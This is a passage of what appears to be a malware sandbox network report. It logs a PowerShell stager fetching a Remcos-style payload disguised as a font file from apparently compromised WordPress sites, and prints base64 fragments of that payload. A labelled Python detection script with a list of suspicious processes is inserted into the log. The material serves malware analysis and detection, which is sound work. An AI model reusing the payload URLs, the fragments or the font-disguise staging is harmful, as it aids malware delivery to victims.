                                                        Data Ascii: /core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/asociatiatraditiimaria.ro\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportT
                                                        2024-07-27 11:31:17 UTC | 16384 | IN | Data Raw: 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 69 73 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 3a 68 6f 76 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 73 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 69 73 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 73 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 69 73 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 20 3e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 3a 68 6f 76 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75
                                                        Data Ascii: lock-button.is-style-outline .wp-block-button__link:hover,.wp-block-buttons .wp-block-button.is-style-outline .wp-block-button__link:focus,.wp-block-buttons .wp-block-button.is-style-outline > .wp-block-button__link:not(.has-text-color):hover,.wp-block-bu
                                                        2024-07-27 11:31:17 UTC | 16384 | IN | Data Raw: 74 68 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 63 75 73 74 6f 6d 2d 2d 61 73 74 2d 77 69 64 65 2d 77 69 64 74 68 2d 73 69 7a 65 29 3b 7d 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 5b 61 73 74 2d 62 6c 6f 63 6b 73 2d 6c 61 79 6f 75 74 5d 20 2e 61 6c 69 67 6e 66 75 6c 6c 20 7b 6d 61 78 2d 77 69 64 74 68 3a 20 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 7d 62 6c 6f 63 6b 71 75 6f 74 65 20 7b 6d 61 72 67 69 6e 3a 20 31 2e 35 65 6d 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 35 29 3b 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69
                                                        Data Ascii: th: var(--wp--custom--ast-wide-width-size);}.entry-content[ast-blocks-layout] .alignfull {max-width: none;}.entry-content .wp-block-columns {margin-bottom: 0;}blockquote {margin: 1.5em;border-color: rgba(0,0,0,0.05);}.wp-block-quote:not(.has-text-align-ri
                                                        2024-07-27 11:31:17 UTC | 16384 | IN | Data Raw: 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 69 74 65 2d 63 6f 6e 74 65 6e 74 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 73 74 2d 61 72 63 68 69 76 65 2d 64 65 73 63 72 69 70 74 69 6f 6e 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 6f 6d 6d 65 6e 74 73 2d 61 72 65 61 20 2e 63 6f 6d 6d 65 6e 74 2d 72 65 73 70 6f 6e 64 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 6f 6d 6d 65 6e 74 73 2d 61 72 65 61 20 2e 61 73 74 2d 63 6f 6d 6d 65 6e 74 2d 6c 69 73 74 20 6c 69 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 6f 6d 6d 65 6e 74 73 2d 61 72 65 61 20 2e 63 6f 6d 6d 65 6e 74 73 2d 74 69 74 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64
                                                        Data Ascii: -container .site-content,.ast-separate-container .ast-archive-description,.ast-separate-container .comments-area .comment-respond,.ast-separate-container .comments-area .ast-comment-list li,.ast-separate-container .comments-area .comments-title{background
                                                        2024-07-27 11:31:17 UTC | 16384 | IN | Data Raw: 61 79 6f 75 74 2d 66 6c 6f 77 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 7b 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32 65 6d 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 30 3b 7d 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 6f 77 20 3e 20 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 6c 65 66 74 7b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69
                                                        Data Ascii: ayout-flow > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}.is-layout-flow > .aligncenter{margin-left: auto !important;margin-right: auto !important;}.is-layout-constrained > .alignleft{float: left;margin-inline-start: 0;margin-i
                                                        2024-07-27 11:31:17 UTC | 16384 | IN | Data Raw: 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 73 74 2d 67 72 69 64 2d 32 20 2e 61 73 74 2d 61 72 74 69 63 6c 65 2d 70 6f 73 74 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 70 6f 73 74 73 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 73 74 2d 67 72 69 64 2d 33 20 2e 61 73 74 2d 61 72 74 69 63 6c 65 2d 70 6f 73 74 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 70 6f 73 74 73 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 73 74 2d 67 72 69 64 2d 34 20 2e 61 73 74 2d 61 72 74 69 63 6c 65 2d 70 6f 73 74 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 70 6f 73 74 73 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 3b 7d 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 73 74 2d
                                                        Data Ascii: ate-container .ast-grid-2 .ast-article-post.ast-separate-posts,.ast-separate-container .ast-grid-3 .ast-article-post.ast-separate-posts,.ast-separate-container .ast-grid-4 .ast-article-post.ast-separate-posts{border-bottom:0;}.ast-separate-container .ast-


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        1 | 192.168.2.5 | 49719 | 93.113.54.56 | 443 | 7244 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-07-27 11:31:23 UTC | 71 | OUT | GET /os/transportment.pfm HTTP/1.1
                                                        Host: asociatiatraditiimaria.ro
                                                        2024-07-27 11:31:24 UTC | 340 | IN | HTTP/1.1 404 Not Found
                                                        Connection: close
                                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                        cache-control: no-cache, must-revalidate, max-age=0
                                                        content-type: text/html; charset=UTF-8
                                                        link: <https://asociatiatraditiimaria.ro/wp-json/>; rel="https://api.w.org/"
                                                        transfer-encoding: chunked
                                                        date: Sat, 27 Jul 2024 11:31:23 GMT
                                                        server: LiteSpeed
                                                        2024-07-27 11:31:24 UTC | 1028 | IN | Data Raw: 31 30 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0d 0a 09 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 41 73 6f 63 69 61 c8 9b 69 61 20 54 72 61 64 69 c8 9b 69 69
                                                        Data Ascii: 10000<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>Page not found &#8211; Asociația Tradiții
                                                        2024-07-27 11:31:24 UTC | 14994 | IN | Data Raw: 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b
                                                        Data Ascii: auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);
                                                        2024-07-27 11:31:24 UTC | 16384 | IN | Data Raw: 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 20 3e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 3a 68 6f 76 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 73 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 2e 69 73 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 35 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 29 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76
                                                        Data Ascii: tyle-outline > .wp-block-button__link:not(.has-text-color):hover,.wp-block-buttons .wp-block-button.wp-block-button__link.is-style-outline:not(.has-text-color):hover{color:var(--ast-global-color-5);background-color:var(--ast-global-color-0);border-color:v
                                                        2024-07-27 11:31:24 UTC | 16384 | IN | Data Raw: 20 31 2e 35 65 6d 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 35 29 3b 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 29 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 63 65 6e 74 65 72 29 20 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 20 35 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 35 29 3b 7d 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 20 3e 20 62 6c 6f 63 6b 71 75 6f 74 65 2c 62 6c 6f 63 6b 71 75 6f 74 65 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 20 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 20 35 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c
                                                        Data Ascii: 1.5em;border-color: rgba(0,0,0,0.05);}.wp-block-quote:not(.has-text-align-right):not(.has-text-align-center) {border-left: 5px solid rgba(0,0,0,0.05);}.has-text-align-right > blockquote,blockquote.has-text-align-right {border-right: 5px solid rgba(0,0,0,
                                                        2024-07-27 11:31:24 UTC | 16384 | IN | Data Raw: 65 6e 74 2d 6c 69 73 74 20 6c 69 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 6f 6d 6d 65 6e 74 73 2d 61 72 65 61 20 2e 63 6f 6d 6d 65 6e 74 73 2d 74 69 74 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 35 29 3b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6e 6f 6e 65 3b 3b 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 39 32 31 70 78 29 7b 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 73 74 2d 61 72 74 69 63 6c 65 2d 73 69 6e 67 6c 65 3a 6e 6f 74 28 2e 61 73 74 2d 72 65 6c 61 74 65 64 2d 70 6f 73 74 29 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f
                                                        Data Ascii: ent-list li,.ast-separate-container .comments-area .comments-title{background-color:var(--ast-global-color-5);;background-image:none;;}@media (max-width:921px){.ast-separate-container .ast-article-single:not(.ast-related-post),.woocommerce.ast-separate-co
                                                        2024-07-27 11:31:24 UTC | 16384 | IN | Data Raw: 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 6c 65 66 74 7b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 32 65 6d 3b 7d 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 7b 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32 65 6d 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 30 3b 7d 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e
                                                        Data Ascii: s-layout-constrained > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}.is-layout-constrained > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}.is-layout-constrained > .aligncenter{margin-left: auto !importan

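Taken together, the HTTP sessions in this part of the report tell the infection story in four exchanges: RegAsm.exe, a .NET registration utility with no reason of its own to look anything up, asks geoplugin.net where the victim is (Remcos is known to do this at start-up), and the PowerShell stage requests a payload named transportment.pfm from two compromised WordPress sites, gets a 404 from the first and a 200 from the second, whose server labels the 519,984-byte body as application/x-font-type1 even though the bytes in the report are base64-alphabet text rather than a PFB (0x80 0x01) or PFA (%!PS-AdobeFont) header. The Python triage pass below is an added example, not Joe Sandbox code or output: it replays those sessions as constructed records (values copied from the session tables; the body prefix is the start of the first data chunk with its "LS0t" run shortened) and flags each of the behaviours just described. The list of processes that should not speak HTTP, the size threshold, the font-header check and the geoplugin.net rule are this example's own heuristics, not something the report states.

```python
"""Triage checks over HTTP sessions as recorded in a sandbox network log.

Added example for this report, not Joe Sandbox code.  The sample sessions are
constructed from the session tables in the report; everything else (process
list, thresholds, font-header check) is this example's own heuristic.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from ipaddress import ip_address
from typing import Dict, List, Optional


@dataclass
class HttpSession:
    process: str                    # image path of the process that opened the socket
    dst_ip: str
    dst_port: int
    method: str
    path: str
    host: str
    status: Optional[int]           # None if no response was captured
    content_type: Optional[str] = None
    content_length: Optional[int] = None
    body_prefix: bytes = b""        # first bytes of the response body


# Hosts that rarely have a legitimate reason to talk HTTP themselves (heuristic list).
UNEXPECTED_NETWORK_PROCESSES = {
    "regasm.exe", "regsvcs.exe", "msbuild.exe", "installutil.exe",
    "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe",
}
# Remcos resolves the victim's location through geoplugin.net shortly after start-up.
GEO_LOOKUP_HOSTS = {"geoplugin.net"}
FONT_CONTENT_TYPES = {"application/x-font-type1", "font/otf", "font/ttf", "font/woff"}
PAYLOAD_MIN_BYTES = 100_000       # heuristic: stagers rarely pull "fonts" this large


def process_basename(image_path: str) -> str:
    return image_path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def plausible_type1_font(prefix: bytes) -> bool:
    """PFB segments start with 0x80 0x01; ASCII Type 1 fonts start with a PostScript header."""
    return (prefix.startswith(b"\x80\x01")
            or prefix.startswith(b"%!PS-AdobeFont")
            or prefix.startswith(b"%!FontType1"))


def base64_like(prefix: bytes, min_len: int = 64) -> bool:
    """True when the sample is nothing but base64-alphabet text (a binary font never is)."""
    return len(prefix) >= min_len and re.fullmatch(rb"[A-Za-z0-9+/=\r\n]+", prefix) is not None


def triage(sessions: List[HttpSession]) -> Dict[int, List[str]]:
    """Return findings keyed by each session's index in `sessions`."""
    findings: Dict[int, List[str]] = defaultdict(list)
    hosts_by_filename = defaultdict(set)          # payload file name -> hosts it was requested from
    for s in sessions:
        hosts_by_filename[s.path.rsplit("/", 1)[-1]].add(s.host.lower())

    for i, s in enumerate(sessions):
        proc = process_basename(s.process)
        if proc in UNEXPECTED_NETWORK_PROCESSES and ip_address(s.dst_ip).is_global:
            findings[i].append(f"outbound HTTP from {proc} to {s.dst_ip}:{s.dst_port}")
        if s.host.lower() in GEO_LOOKUP_HOSTS:
            findings[i].append(f"geolocation lookup via {s.host} (Remcos start-up behaviour)")
        if s.status == 200 and (s.content_length or 0) >= PAYLOAD_MIN_BYTES:
            declared = (s.content_type or "").split(";")[0].strip().lower()
            if (declared in FONT_CONTENT_TYPES
                    and not plausible_type1_font(s.body_prefix)
                    and base64_like(s.body_prefix)):
                findings[i].append(f"{s.content_length}-byte body declared {declared} "
                                   f"but is base64-alphabet text ({s.path})")
        filename = s.path.rsplit("/", 1)[-1]
        if s.status == 200 and len(hosts_by_filename[filename]) > 1:
            findings[i].append(f"payload {filename} requested from "
                               f"{len(hosts_by_filename[filename])} hosts; this fetch returned 200")
    return dict(findings)


# Constructed from the session tables in this report (not captured by this script).
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_SESSIONS = [
    HttpSession(r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", "178.237.33.50", 80,
                "GET", "/json.gp", "geoplugin.net", 200, "application/json; charset=utf-8", 962,
                b'{\n  "geoplugin_request":"8.46.123.33",'),
    HttpSession(PS, "93.113.54.56", 443, "GET", "/os/transportment.pfm", "asociatiatraditiimaria.ro",
                404, "text/html; charset=UTF-8", None, b"10000\r\n<!DOCTYPE html>"),
    HttpSession(PS, "93.113.54.56", 443, "GET", "/os/transportment.pfm", "asociatiatraditiimaria.ro",
                404, "text/html; charset=UTF-8", None, b"10000\r\n<!DOCTYPE html>"),
    # body prefix: start of the first data chunk; the report shows a long run of "LS0t" (base64 of "---")
    HttpSession(PS, "34.166.62.190", 443, "GET", "/wp-admin/oserve/transportment.pfm",
                "new.quranushaiqer.org.sa", 200, "application/x-font-type1", 519984,
                b"2cnYwutE+YdSY" + b"LS0t" * 16),
]

if __name__ == "__main__":
    for idx, notes in triage(SAMPLE_SESSIONS).items():
        for note in notes:
            print(f"session[{idx}]: {note}")
```

Each check is deliberately independent so a miss on one (a stager that picks a believable MIME type, say) still leaves the process-origin and multi-host findings standing; in a real pipeline the records would come from the sandbox's PCAP or proxy log rather than being typed in.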

                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        2 | 192.168.2.5 | 49720 | 34.166.62.190 | 443 | 7244 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-07-27 11:31:30 UTC | 107 | OUT | GET /wp-admin/oserve/transportment.pfm HTTP/1.1
                                                        Host: new.quranushaiqer.org.sa
                                                        Connection: Keep-Alive
                                                        2024-07-27 11:31:30 UTC | 396 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.26.1
                                                        Date: Sat, 27 Jul 2024 11:31:30 GMT
                                                        Content-Type: application/x-font-type1
                                                        Content-Length: 519984
                                                        Connection: close
                                                        Last-Modified: Mon, 08 Jul 2024 02:08:54 GMT
                                                        ETag: "7ef30-61cb2e520d854"
                                                        Accept-Ranges: bytes
                                                        X-Cache: HIT from Backend
                                                        Strict-Transport-Security: max-age=31536000
                                                        X-XSS-Protection: 1; mode=block
                                                        X-Content-Type-Options: nosniff
                                                        2024-07-27 11:31:30 UTC | 15988 | IN | Data Raw: 32 63 6e 59 77 75 74 45 2b 59 64 53 59 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 54 70 72 77 41 41 41 4e 6e 2f 68 38 6e 72 58 76 71 6a 4a 6b 32 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 55 66 4a 64 37 6b 6d 39 76 69 36 30 49 6e 4b 34 56
                                                        Data Ascii: 2cnYwutE+YdSYLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTprwAAANn/h8nrXvqjJk21tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbUfJd7km9vi60InK4V
                                                        2024-07-27 11:31:30 UTC | 16384 | IN | Data Raw: 58 59 62 66 57 6d 54 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 74 6e 31 32 65 58 72 54 73 55 46 37 30 46 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 51 2b 42 74 41 41 41 41 4e 6a 4b 32 65 44 72 54 36 63
                                                        Data Ascii: XYbfWmT+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/tn12eXrTsUF70F1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dQ+BtAAAANjK2eDrT6c
                                                        2024-07-27 11:31:30 UTC | 610 | IN | Data Raw: 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 77 2b 42 71 51 41 41 41 4e 6e 4a 32 65 54 72 55 4e 67 63 31 69 47 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 6d 32 59 50 63 2f 46 57 44 36 37 77 36 30 69 35 36 54 55 35 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55
                                                        Data Ascii: k5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTkw+BqQAAANnJ2eTrUNgc1iGzs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozm2YPc/FWD67w60i56TU5BQUFBQUFBQUFBQU
